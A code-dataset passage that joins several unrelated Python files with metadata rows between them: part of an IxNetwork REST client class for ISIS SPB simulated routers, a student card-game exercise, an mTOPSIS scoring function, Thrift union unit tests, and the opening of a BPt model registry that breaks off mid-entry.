from ixnetwork_restpy.testplatform.sessions.ixnetwork.topology.spbsimedgetopologylist_5e9b551439bb252c1fa3e2c6948a1432 import SpbSimEdgeTopologyList
if self._properties.get('SpbSimEdgeTopologyList', None) is not None:
return self._properties.get('SpbSimEdgeTopologyList')
else:
return SpbSimEdgeTopologyList(self)._select()
@property
def Active(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Activate/Deactivate Configuration
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['Active']))
@property
def BridgePriority(self):
# type: () -> 'Multivalue'
"""
Returns
-------
- obj(ixnetwork_restpy.multivalue.Multivalue): Bridge Priority
"""
from ixnetwork_restpy.multivalue import Multivalue
return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['BridgePriority']))
@property
def ConnectedVia(self):
# type: () -> List[str]
"""DEPRECATED
Returns
-------
- list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of layers this layer is used to connect with to the wire.
"""
return self._get_attribute(self._SDM_ATT_MAP['ConnectedVia'])
@ConnectedVia.setter
def ConnectedVia(self, value):
# type: (List[str]) -> None
self._set_attribute(self._SDM_ATT_MAP['ConnectedVia'], value)
@property
def Count(self):
# type: () -> int
"""
Returns
-------
- number: Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
"""
return self._get_attribute(self._SDM_ATT_MAP['Count'])
@property
def DescriptiveName(self):
# type: () -> str
"""
Returns
-------
- str: Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
"""
return self._get_attribute(self._SDM_ATT_MAP['DescriptiveName'])
@property
def Errors(self):
"""
Returns
-------
- list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str])): A list of errors that have occurred
"""
return self._get_attribute(self._SDM_ATT_MAP['Errors'])
@property
def Multiplier(self):
# type: () -> int
"""
Returns
-------
- number: Number of layer instances per parent instance (multiplier)
"""
return self._get_attribute(self._SDM_ATT_MAP['Multiplier'])
@Multiplier.setter
def Multiplier(self, value):
# type: (int) -> None
self._set_attribute(self._SDM_ATT_MAP['Multiplier'], value)
@property
def Name(self):
# type: () -> str
"""
Returns
-------
- str: Name of NGPF element, guaranteed to be unique in Scenario
"""
return self._get_attribute(self._SDM_ATT_MAP['Name'])
@Name.setter
def Name(self, value):
# type: (str) -> None
self._set_attribute(self._SDM_ATT_MAP['Name'], value)
@property
def SessionStatus(self):
# type: () -> List[str]
"""
Returns
-------
- list(str[down | notStarted | up]): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
"""
return self._get_attribute(self._SDM_ATT_MAP['SessionStatus'])
@property
def SpSourceId(self):
    # type: () -> 'Multivalue'
    """Read-only.

    Returns
    -------
    - obj(ixnetwork_restpy.multivalue.Multivalue): SP Source Id
    """
    # Imported lazily — presumably to avoid an import cycle at module
    # load time; confirm before hoisting to the top of the file.
    from ixnetwork_restpy.multivalue import Multivalue
    return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SpSourceId']))
@property
def SpbTopologyCount(self):
    # type: () -> int
    """Read-only.

    Returns
    -------
    - number: Topology Count
    """
    return self._get_attribute(self._SDM_ATT_MAP['SpbTopologyCount'])
@property
def StackedLayers(self):
    # type: () -> List[str]
    """
    Returns
    -------
    - list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*]): List of secondary (many to one) child layer protocols
    """
    return self._get_attribute(self._SDM_ATT_MAP['StackedLayers'])
@StackedLayers.setter
def StackedLayers(self, value):
    # type: (List[str]) -> None
    # Writes the new layer-href list back to the server-side attribute map.
    self._set_attribute(self._SDM_ATT_MAP['StackedLayers'], value)
@property
def StateCounts(self):
    """Read-only.

    Returns
    -------
    - dict(total:number,notStarted:number,down:number,up:number): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
    """
    return self._get_attribute(self._SDM_ATT_MAP['StateCounts'])
@property
def Status(self):
    # type: () -> str
    """Read-only.

    Returns
    -------
    - str(configured | error | mixed | notStarted | started | starting | stopping): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.
    """
    return self._get_attribute(self._SDM_ATT_MAP['Status'])
@property
def SystemId(self):
    # type: () -> 'Multivalue'
    """Read-only.

    Returns
    -------
    - obj(ixnetwork_restpy.multivalue.Multivalue): System Id
    """
    # Imported lazily — presumably to avoid an import cycle at module
    # load time; confirm before hoisting to the top of the file.
    from ixnetwork_restpy.multivalue import Multivalue
    return Multivalue(self, self._get_attribute(self._SDM_ATT_MAP['SystemId']))
def update(self, ConnectedVia=None, Multiplier=None, Name=None, StackedLayers=None):
    # type: (List[str], int, str, List[str]) -> IsisSpbSimRouter
    """Updates isisSpbSimRouter resource on the server.

    This method has some named parameters with a type: obj (Multivalue).
    The Multivalue class has documentation that details the possible values for those named parameters.

    Args
    ----
    - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
    - Multiplier (number): Number of layer instances per parent instance (multiplier)
    - Name (str): Name of NGPF element, guaranteed to be unique in Scenario
    - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols

    Raises
    ------
    - ServerError: The server has encountered an uncategorized error condition
    """
    # NOTE: _map_locals() picks the keyword arguments out of locals() by
    # name, so no temporaries may be introduced before this call.
    return self._update(self._map_locals(self._SDM_ATT_MAP, locals()))
def add(self, ConnectedVia=None, Multiplier=None, Name=None, StackedLayers=None):
    # type: (List[str], int, str, List[str]) -> IsisSpbSimRouter
    """Adds a new isisSpbSimRouter resource on the server and adds it to the container.

    Args
    ----
    - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
    - Multiplier (number): Number of layer instances per parent instance (multiplier)
    - Name (str): Name of NGPF element, guaranteed to be unique in Scenario
    - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols

    Returns
    -------
    - self: This instance with all currently retrieved isisSpbSimRouter resources using find and the newly added isisSpbSimRouter resources available through an iterator or index

    Raises
    ------
    - ServerError: The server has encountered an uncategorized error condition
    """
    # NOTE: _map_locals() picks the keyword arguments out of locals() by
    # name, so no temporaries may be introduced before this call.
    return self._create(self._map_locals(self._SDM_ATT_MAP, locals()))
def remove(self):
    """Deletes all the contained isisSpbSimRouter resources in this instance from the server.

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    self._delete()
def find(self, ConnectedVia=None, Count=None, DescriptiveName=None, Errors=None, Multiplier=None, Name=None, SessionStatus=None, SpbTopologyCount=None, StackedLayers=None, StateCounts=None, Status=None):
    """Finds and retrieves isisSpbSimRouter resources from the server.

    All named parameters are evaluated on the server using regex. The named parameters can be used to selectively retrieve isisSpbSimRouter resources from the server.
    To retrieve an exact match ensure the parameter value starts with ^ and ends with $
    By default the find method takes no parameters and will retrieve all isisSpbSimRouter resources from the server.

    Args
    ----
    - ConnectedVia (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of layers this layer is used to connect with to the wire.
    - Count (number): Number of elements inside associated multiplier-scaled container object, e.g. number of devices inside a Device Group.
    - DescriptiveName (str): Longer, more descriptive name for element. It's not guaranteed to be unique like -name-, but may offer more context.
    - Errors (list(dict(arg1:str[None | /api/v1/sessions/1/ixnetwork//.../*],arg2:list[str]))): A list of errors that have occurred
    - Multiplier (number): Number of layer instances per parent instance (multiplier)
    - Name (str): Name of NGPF element, guaranteed to be unique in Scenario
    - SessionStatus (list(str[down | notStarted | up])): Current state of protocol session: Not Started - session negotiation not started, the session is not active yet. Down - actively trying to bring up a protocol session, but negotiation is didn't successfully complete (yet). Up - session came up successfully.
    - SpbTopologyCount (number): Topology Count
    - StackedLayers (list(str[None | /api/v1/sessions/1/ixnetwork/topology/.../*])): List of secondary (many to one) child layer protocols
    - StateCounts (dict(total:number,notStarted:number,down:number,up:number)): A list of values that indicates the total number of sessions, the number of sessions not started, the number of sessions down and the number of sessions that are up
    - Status (str(configured | error | mixed | notStarted | started | starting | stopping)): Running status of associated network element. Once in Started state, protocol sessions will begin to negotiate.

    Returns
    -------
    - self: This instance with matching isisSpbSimRouter resources retrieved from the server available through an iterator or index

    Raises
    ------
    - ServerError: The server has encountered an uncategorized error condition
    """
    # NOTE: _map_locals() picks the regex filters out of locals() by
    # name, so no temporaries may be introduced before this call.
    return self._select(self._map_locals(self._SDM_ATT_MAP, locals()))
def read(self, href):
    """Retrieves a single instance of isisSpbSimRouter data from the server.

    Args
    ----
    - href (str): An href to the instance to be retrieved

    Returns
    -------
    - self: This instance with the isisSpbSimRouter resources from the server available through an iterator or index

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    return self._read(href)
def Abort(self, *args, **kwargs):
    # type: (*Any, **Any) -> None
    """Executes the abort operation on the server.

    Abort CPF control plane (equals to demote to kUnconfigured state).

    The IxNetwork model allows several overloads of this operation:

    - abort(async_operation=bool)
    - abort(SessionIndices=list, async_operation=bool)  # e.g. [1, 2, 3]
    - abort(SessionIndices=str, async_operation=bool)   # e.g. '1-4;6;7-12'

    async_operation defaults to False; when True, any subsequent rest api
    calls made through the Connection class will block until the operation
    is complete.

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Positional args become Arg2, Arg3, ... in the execute payload.
    payload = {'Arg1': self}
    for position, value in enumerate(args, start=2):
        payload['Arg%s' % position] = value
    payload.update(kwargs)
    return self._execute('abort', payload=payload, response_object=None)
def RestartDown(self, *args, **kwargs):
    # type: (*Any, **Any) -> None
    """Executes the restartDown operation on the server.

    Stop and start interfaces and sessions that are in Down state.

    The IxNetwork model allows several overloads of this operation:

    - restartDown(async_operation=bool)
    - restartDown(SessionIndices=list, async_operation=bool)  # e.g. [1, 2, 3]
    - restartDown(SessionIndices=str, async_operation=bool)   # e.g. '1-4;6;7-12'

    async_operation defaults to False; when True, any subsequent rest api
    calls made through the Connection class will block until the operation
    is complete.

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Positional args become Arg2, Arg3, ... in the execute payload.
    payload = {'Arg1': self}
    for position, value in enumerate(args, start=2):
        payload['Arg%s' % position] = value
    payload.update(kwargs)
    return self._execute('restartDown', payload=payload, response_object=None)
def Start(self, *args, **kwargs):
    # type: (*Any, **Any) -> None
    """Executes the start operation on the server.

    Start CPF control plane (equals to promote to negotiated state).

    The IxNetwork model allows several overloads of this operation:

    - start(async_operation=bool)
    - start(SessionIndices=list, async_operation=bool)  # e.g. [1, 2, 3]
    - start(SessionIndices=str, async_operation=bool)   # e.g. '1-4;6;7-12'

    async_operation defaults to False; when True, any subsequent rest api
    calls made through the Connection class will block until the operation
    is complete.

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Positional args become Arg2, Arg3, ... in the execute payload.
    payload = {'Arg1': self}
    for position, value in enumerate(args, start=2):
        payload['Arg%s' % position] = value
    payload.update(kwargs)
    return self._execute('start', payload=payload, response_object=None)
def Stop(self, *args, **kwargs):
    # type: (*Any, **Any) -> None
    """Executes the stop operation on the server.

    Stop CPF control plane (equals to demote to PreValidated-DoDDone state).

    The IxNetwork model allows several overloads of this operation:

    - stop(async_operation=bool)
    - stop(SessionIndices=list, async_operation=bool)  # e.g. [1, 2, 3]
    - stop(SessionIndices=str, async_operation=bool)   # e.g. '1-4;6;7-12'

    async_operation defaults to False; when True, any subsequent rest api
    calls made through the Connection class will block until the operation
    is complete.

    Raises
    ------
    - NotFoundError: The requested resource does not exist on the server
    - ServerError: The server has encountered an uncategorized error condition
    """
    # Positional args become Arg2, Arg3, ... in the execute payload.
    payload = {'Arg1': self}
    for position, value in enumerate(args, start=2):
        payload['Arg%s' % position] = value
    payload.update(kwargs)
    return self._execute('stop', payload=payload, response_object=None)
def get_device_ids(self, PortNames=None, Active=None, BridgePriority=None, SpSourceId=None, SystemId=None):
    """Base class infrastructure that gets a list of isisSpbSimRouter device ids encapsulated by this object.

    Use the optional regex parameters in the method to refine the list of device ids encapsulated by this object.

    Args
    ----
    - PortNames (str): optional regex of port names
    - Active (str): optional regex of active
    - BridgePriority (str): optional regex of bridgePriority
    - SpSourceId (str): optional regex of spSourceId
    - SystemId (str): optional regex of systemId

    Returns
    -------
    - list(int): A list of device ids that meets the regex criteria provided in the method parameters

    Raises
    ------
    - ServerError: The server has encountered an uncategorized error condition
    """
    # locals() forwards the regex filters by parameter name; do not add
    # temporaries before this call.
    return self._get_ngpf_device_ids(locals())
| 46.904297 | 318 | 0.651968 |
daf1724ec3c56fe12e919c981a3459334cbebce4 | 1,568 | py | Python | LABORATORIO 7/ejercicio 8 lab 7.py | msolivera/Phyton | 1322fa2ff4bb06a17350fefa7e5268c0969e5b53 | [
"bzip2-1.0.6"
] | null | null | null | LABORATORIO 7/ejercicio 8 lab 7.py | msolivera/Phyton | 1322fa2ff4bb06a17350fefa7e5268c0969e5b53 | [
"bzip2-1.0.6"
] | null | null | null | LABORATORIO 7/ejercicio 8 lab 7.py | msolivera/Phyton | 1322fa2ff4bb06a17350fefa7e5268c0969e5b53 | [
"bzip2-1.0.6"
] | null | null | null | import random
class carta:
    """A single Spanish-deck playing card."""

    def __init__(self, palo, valor):
        # palo: suit name; valor: face value (1-7, 10-12).
        self.palo = palo
        self.valor = valor

    def __repr__(self):
        return f"Carta: {self.valor} de {self.palo}"
# Card class defined above.
# TODO: remove dealt cards from the deck as they are drawn.
def def_mazo():
    """Build the 40-card Spanish deck: values 1-7 and 10-12 in four suits."""
    suits = ("oro", "copa", "basto", "espada")
    mazo = []
    for valor in range(1, 13):
        if valor in (8, 9):
            continue  # the Spanish deck has no 8s or 9s
        for palo in suits:
            mazo.append(carta(palo, valor))
    return mazo
# Smoke check: show a freshly built 40-card deck.
print(def_mazo())
def def_mano(mazo):
    """Deal a 3-card hand from *mazo*, removing the dealt cards.

    Fixes the TODO noted in this file: cards are now drawn without
    replacement and disappear from the deck, so the same card can no
    longer appear twice in one hand (or in the face-up sample later).

    Args
    ----
    - mazo (list): the deck; mutated in place (3 cards removed).

    Returns
    -------
    - list: the 3 dealt cards.
    """
    mano = []
    for _ in range(3):
        # Pop a random card so it cannot be drawn again.
        mano.append(mazo.pop(random.randint(0, len(mazo) - 1)))
    return mano
# Demo: build a deck and deal a hand of three cards.
mazo=def_mazo()
mano=def_mano(mazo)
print (mano)
def muestra(mazo):
    """Draw the face-up sample card: a random card from *mazo*.

    Bug fix: the upper bound now uses len(mazo) instead of rebuilding a
    whole new deck with len(def_mazo()) - the old code always indexed
    with a bound of 40, which raises IndexError as soon as the real deck
    has fewer cards (e.g. after dealing hands).
    """
    return mazo[random.randint(0, len(mazo) - 1)]
# Draw and show the face-up sample card.
muestra_mano=muestra(mazo)
print(muestra_mano)
def flor_derecha(x):
    """Return True when the three cards of hand *x* all share one suit."""
    return x[0].palo == x[1].palo == x[2].palo
# Show whether the dealt hand is a "flor" (all three cards of one suit).
print(flor_derecha(mano))
def pieza(mano, muestra):
    """Return True if any card in *mano* is a "pieza".

    A pieza is a card of the sample's suit whose value is one of
    2, 4, 5, 10 or 12.

    Generalized: the original hard-coded mano[0], mano[1] and mano[2],
    so it only worked for 3-card hands; this version accepts a hand of
    any size while behaving identically for 3-card hands.
    """
    return any(c.palo == muestra.palo and c.valor in (2, 4, 5, 10, 12)
               for c in mano)
# Show whether the dealt hand holds a "pieza" for the sample card.
print(pieza(mano,muestra_mano))
| 20.102564 | 72 | 0.610332 |
3a9ca24e00eca92e48fd9d9d6c34e8e57760ad99 | 3,988 | py | Python | env/Lib/site-packages/mcdm/scoring/mtopsis.py | IzzatHalabi/newpix_prototype | 5d617ef20df59af57c26ca0f7fc8521afd4203f7 | [
"MIT"
] | null | null | null | env/Lib/site-packages/mcdm/scoring/mtopsis.py | IzzatHalabi/newpix_prototype | 5d617ef20df59af57c26ca0f7fc8521afd4203f7 | [
"MIT"
] | 4 | 2020-07-28T17:43:16.000Z | 2022-02-27T09:40:50.000Z | env/Lib/site-packages/mcdm/scoring/mtopsis.py | IzzatHalabi/newpix_prototype | 5d617ef20df59af57c26ca0f7fc8521afd4203f7 | [
"MIT"
] | null | null | null | # Copyright (c) 2020 Dimitrios-Georgios Akestoridis
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be included
# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY
# CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT,
# TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
# SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
import numpy as np
def mtopsis(z_matrix, w_vector, is_benefit_z):
    """Python implementation of the mTOPSIS scoring method.

    For more information, see the following publication:

    * H. Deng, C.-H. Yeh, and R. J. Willis, "Inter-company comparison
      using modified TOPSIS with objective weights," Computers &
      Operations Research, vol. 27, no. 10, pp. 963--973, 2000.
      DOI: 10.1016/S0305-0548(99)00069-6.

    Returns a tuple (score vector, descending-order flag).
    """
    # Work on float64 NumPy copies of both inputs.
    z_matrix = np.array(z_matrix, dtype=np.float64)
    w_vector = np.array(w_vector, dtype=np.float64)

    # Sanity checks.
    if (np.sum(np.less(z_matrix, 0.0)) > 0
            or np.sum(np.greater(z_matrix, 1.0)) > 0):
        raise ValueError("The decision matrix must be normalized "
                         "in order to apply the mTOPSIS scoring method")
    elif w_vector.shape != (z_matrix.shape[1],):
        raise ValueError("The shape of the weight vector is not "
                         "appropriate for the number of columns in the "
                         "decision matrix")
    elif not np.isclose(np.sum(w_vector), 1.0):
        raise ValueError("The weight vector's elements must sum to 1")
    elif len(is_benefit_z) != z_matrix.shape[1]:
        raise ValueError("The number of variables in the list that "
                         "determines whether each criterion is a benefit "
                         "or a cost criterion does not match the number "
                         "of columns in the decision matrix")

    # mTOPSIS scores should always be sorted in descending order.
    desc_order = True

    num_alts, num_crit = z_matrix.shape

    # Per-criterion best (positive-ideal) and worst (negative-ideal)
    # values; for cost criteria the roles of min and max are swapped.
    pos_ideal_sol = np.zeros(num_crit, dtype=np.float64)
    neg_ideal_sol = np.zeros(num_crit, dtype=np.float64)
    for j, is_benefit in enumerate(is_benefit_z):
        column = z_matrix[:, j]
        if is_benefit:
            pos_ideal_sol[j] = np.amax(column)
            neg_ideal_sol[j] = np.amin(column)
        else:
            pos_ideal_sol[j] = np.amin(column)
            neg_ideal_sol[j] = np.amax(column)

    # Score each alternative by its relative closeness to the
    # negative-ideal solution, using weighted squared distances.
    s_vector = np.zeros(num_alts, dtype=np.float64)
    for i in range(num_alts):
        d_pos = 0.0
        d_neg = 0.0
        for j in range(num_crit):
            d_pos += w_vector[j] * (pos_ideal_sol[j] - z_matrix[i, j])**2
            d_neg += w_vector[j] * (z_matrix[i, j] - neg_ideal_sol[j])**2
        d_pos = np.sqrt(d_pos)
        d_neg = np.sqrt(d_neg)
        s_vector[i] = d_neg / (d_neg + d_pos)
    return s_vector, desc_order
| 46.372093 | 77 | 0.660732 |
72864a966e4065c83e2afedd5bb2fded561104df | 4,395 | py | Python | thrift/test/py/UnionTests.py | dgrnbrg-meta/fbthrift | 1d5f0799ef53feeb83425b6c9c79f86aeac7d9ed | [
"Apache-2.0"
] | null | null | null | thrift/test/py/UnionTests.py | dgrnbrg-meta/fbthrift | 1d5f0799ef53feeb83425b6c9c79f86aeac7d9ed | [
"Apache-2.0"
] | null | null | null | thrift/test/py/UnionTests.py | dgrnbrg-meta/fbthrift | 1d5f0799ef53feeb83425b6c9c79f86aeac7d9ed | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
# Copyright (c) Facebook, Inc. and its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import json
import unittest
from thrift.protocol import TBinaryProtocol
from thrift.protocol import TSimpleJSONProtocol
from thrift.transport import TTransport
from thrift.test.UnionTest.ttypes import *
class TestUnionStructs(unittest.TestCase):
    """Tests for Thrift union semantics: construction, field accessors,
    JSON (de)serialization and binary round-trips.

    Improvements over the original: deprecated assertEquals replaced by
    assertEqual, try/except + assertTrue(False) replaced by
    assertRaises, and the ambiguously named variable ``l`` renamed.
    """

    def test_init(self):
        u = TestUnion()
        self.assertEqual(TestUnion.__EMPTY__, u.getType())

        v = TestUnion(string_field="test")
        self.assertEqual(TestUnion.STRING_FIELD, v.getType())
        self.assertEqual("test", v.value)
        self.assertNotEqual(u, v)

        # A union may be initialized with at most one field.
        with self.assertRaises(Exception):
            TestUnion(string_field="test", i32_field=100)

    def test_get_set(self):
        u = TestUnion()
        u.set_i32_field(10)
        self.assertEqual(10, u.get_i32_field())

        v = TestUnion(i32_field=10)
        self.assertEqual(u, v)

        # Reading a field other than the currently-set one must assert.
        self.assertRaises(AssertionError, u.get_other_i32_field)

    def _test_json(self, j, v):
        """Deserialize dict *j* from JSON and expect equality with *v*."""
        u = TestUnion()
        u.readFromJson(json.dumps(j))
        self.assertEqual(v, u)

    def test_json(self):
        self._test_json({"i32_field": 123}, TestUnion(i32_field=123))
        self._test_json({"string_field": "test"},
                        TestUnion(string_field="test"))

    def test_repr(self):
        """Ensure that __repr__() returns a valid expression that can be
        used to construct the original object.
        """
        for v in (TestUnion(i32_field=123),
                  TestUnion(),
                  TestUnion(string_field="test")):
            self.assertEqual(v, eval(v.__repr__()))

    def _test_read_write(self, u, expected):
        """Round-trip *u* through the accelerated binary protocol."""
        protocol_factory = TBinaryProtocol.TBinaryProtocolAcceleratedFactory()
        databuf = TTransport.TMemoryBuffer()
        u.write(protocol_factory.getProtocol(databuf))

        ndatabuf = TTransport.TMemoryBuffer(databuf.getvalue())
        v = u.__class__()
        v.read(protocol_factory.getProtocol(ndatabuf))
        self.assertEqual(v, expected)

    def test_read_write(self):
        cases = [
            (TestUnion(string_field="test"), TestUnion(string_field="test")),
            (TestUnion(), TestUnion()),
            (TestUnion(i32_field=100), TestUnion(i32_field=100)),
            (
                StructWithUnionAndOther(TestUnion(i32_field=100), "test"),
                StructWithUnionAndOther(TestUnion(i32_field=100), "test"),
            ),
        ]
        for value, expected in cases:
            self._test_read_write(value, expected)

    def _test_json_output(self, u, expected):
        """Serialize *u* with TSimpleJSONProtocol; compare to *expected*."""
        protocol_factory = TSimpleJSONProtocol.TSimpleJSONProtocolFactory()
        databuf = TTransport.TMemoryBuffer()
        u.write(protocol_factory.getProtocol(databuf))
        self.assertEqual(expected, json.loads(databuf.getvalue().decode()))

    def test_json_output(self):
        cases = [
            (TestUnion(), {}),
            (TestUnion(i32_field=10), {"i32_field": 10}),
            (TestUnion(string_field="test"), {"string_field": "test"}),
            (
                StructWithUnionAndOther(TestUnion(i32_field=10), "test"),
                {"test_union": {"i32_field": 10}, "string_field": "test"},
            ),
        ]
        for value, expected in cases:
            self._test_json_output(value, expected)

    def testIsUnion(self):
        self.assertFalse(OneOfEach.isUnion())
        self.assertTrue(TestUnion.isUnion())
| 31.847826 | 78 | 0.638453 |
87d7c5c8ba99e34e0399392ef8c1aca3b5d09146 | 9,909 | py | Python | BPt/default/options/models.py | sahahn/ABCD_ML | a8b1c48c33f3fdc046c8922964f1c456273238da | [
"MIT"
] | 1 | 2019-09-25T23:23:49.000Z | 2019-09-25T23:23:49.000Z | BPt/default/options/models.py | sahahn/ABCD_ML | a8b1c48c33f3fdc046c8922964f1c456273238da | [
"MIT"
] | 1 | 2020-04-20T20:53:27.000Z | 2020-04-20T20:53:27.000Z | BPt/default/options/models.py | sahahn/ABCD_ML | a8b1c48c33f3fdc046c8922964f1c456273238da | [
"MIT"
] | 1 | 2019-06-21T14:44:40.000Z | 2019-06-21T14:44:40.000Z | from ...extensions.mlp import MLPRegressor_Wrapper, MLPClassifier_Wrapper
from sklearn.neighbors import KNeighborsClassifier, KNeighborsRegressor
from sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor
from sklearn.naive_bayes import GaussianNB
from sklearn.gaussian_process import (GaussianProcessClassifier,
GaussianProcessRegressor)
from sklearn.ensemble import (GradientBoostingClassifier,
GradientBoostingRegressor,
RandomForestRegressor, RandomForestClassifier,
ExtraTreesClassifier, ExtraTreesRegressor,
HistGradientBoostingRegressor,
HistGradientBoostingClassifier)
from sklearn.linear_model import (LogisticRegression, ElasticNet,
LinearRegression, HuberRegressor,
Lasso, Ridge, SGDClassifier,
SGDRegressor,
PassiveAggressiveClassifier,
BayesianRidge, ARDRegression,
TweedieRegressor)
from sklearn.svm import SVC, LinearSVR, SVR, LinearSVC
import warnings
from ..helpers import get_obj_and_params, all_from_avaliable
# Maps user-facing model aliases to canonical model names, per problem
# type. The canonical names are the keys of MODELS below.
AVAILABLE = {
    'binary': {
        'logistic': 'logistic',
        'linear': 'logistic',
        'lasso': 'lasso logistic',
        'ridge': 'ridge logistic',
        'elastic': 'elastic net logistic',
        'elastic net': 'elastic net logistic',
        'gaussian nb': 'gaussian nb',
        'knn': 'knn classifier',
        'dt': 'dt classifier',
        'rf': 'random forest classifier',
        'random forest': 'random forest classifier',
        'gp': 'gp classifier',
        'svm': 'svm classifier',
        'svc': 'svm classifier',
        'linear svm': 'linear svm classifier',
        'linear svc': 'linear svm classifier',
        'mlp': 'mlp classifier',
        'sgd': 'sgd classifier',
        'gb': 'gb classifier',
        'hgb': 'hgb classifier',
        'et': 'et classifier',
        'pa': 'pa classifier',
    },
    'regression': {
        'linear': 'linear regressor',
        'knn': 'knn regressor',
        'dt': 'dt regressor',
        'elastic': 'elastic net regressor',
        'elastic net': 'elastic net regressor',
        'rf': 'random forest regressor',
        'random forest': 'random forest regressor',
        'gp': 'gp regressor',
        'svm': 'svm regressor',
        'svr': 'svm regressor',
        'linear svm': 'linear svm regressor',
        'linear svr': 'linear svm regressor',
        'mlp': 'mlp regressor',
        'ridge': 'ridge regressor',
        'lasso': 'lasso regressor',
        'gb': 'gb regressor',
        'hgb': 'hgb regressor',
        'et': 'et regressor',
        'bayesian ridge': 'bayesian ridge regressor',
        'ard': 'ard regressor',
        'tweedie': 'tweedie regressor',
    },
}

# Multiclass ('categorical') problems support the same estimators as
# binary; copy so later per-type additions do not alias each other.
AVAILABLE['categorical'] = AVAILABLE['binary'].copy()
# Canonical model name -> (estimator class, list of registered parameter
# distribution names that can be requested for that estimator).
MODELS = {
    'logistic': (LogisticRegression, ['base logistic']),
    'lasso logistic': (LogisticRegression, ['base lasso', 'lasso C',
                                            'lasso C extra']),
    'ridge logistic': (LogisticRegression, ['base ridge', 'ridge C',
                                            'ridge C extra']),
    'elastic net logistic': (LogisticRegression, ['base elastic',
                                                  'elastic classifier',
                                                  'elastic clf v2',
                                                  'elastic classifier extra']),
    'elastic net regressor': (ElasticNet, ['base elastic net',
                                           'elastic regression',
                                           'elastic regression extra']),
    'ridge regressor': (Ridge, ['base ridge regressor',
                                'ridge regressor dist']),
    'lasso regressor': (Lasso, ['base lasso regressor',
                                'lasso regressor dist']),
    'huber': (HuberRegressor, ['base huber']),
    'gaussian nb': (GaussianNB, ['base gnb']),
    'knn classifier': (KNeighborsClassifier, ['base knn', 'knn dist']),
    'knn regressor': (KNeighborsRegressor, ['base knn regression',
                                            'knn dist regression']),
    'dt classifier': (DecisionTreeClassifier, ['default',
                                               'dt classifier dist']),
    'dt regressor': (DecisionTreeRegressor, ['default', 'dt dist']),
    'linear regressor': (LinearRegression, ['base linear']),
    'random forest regressor': (RandomForestRegressor, ['base rf', 'rf dist']),
    'random forest classifier': (RandomForestClassifier,
                                 ['base rf regressor', 'rf classifier dist']),
    'gp regressor': (GaussianProcessRegressor, ['base gp regressor']),
    'gp classifier': (GaussianProcessClassifier, ['base gp classifier']),
    'svm regressor': (SVR, ['base svm', 'svm dist']),
    'svm classifier': (SVC, ['base svm classifier', 'svm classifier dist']),
    'mlp regressor': (MLPRegressor_Wrapper, ['default', 'mlp dist 3 layer',
                                             'mlp dist es 3 layer',
                                             'mlp dist 2 layer',
                                             'mlp dist es 2 layer',
                                             'mlp dist 1 layer',
                                             'mlp dist es 1 layer']),
    'mlp classifier': (MLPClassifier_Wrapper, ['default', 'mlp dist 3 layer',
                                               'mlp dist es 3 layer',
                                               'mlp dist 2 layer',
                                               'mlp dist es 2 layer',
                                               'mlp dist 1 layer',
                                               'mlp dist es 1 layer']),
    'linear svm classifier': (LinearSVC, ['base linear svc',
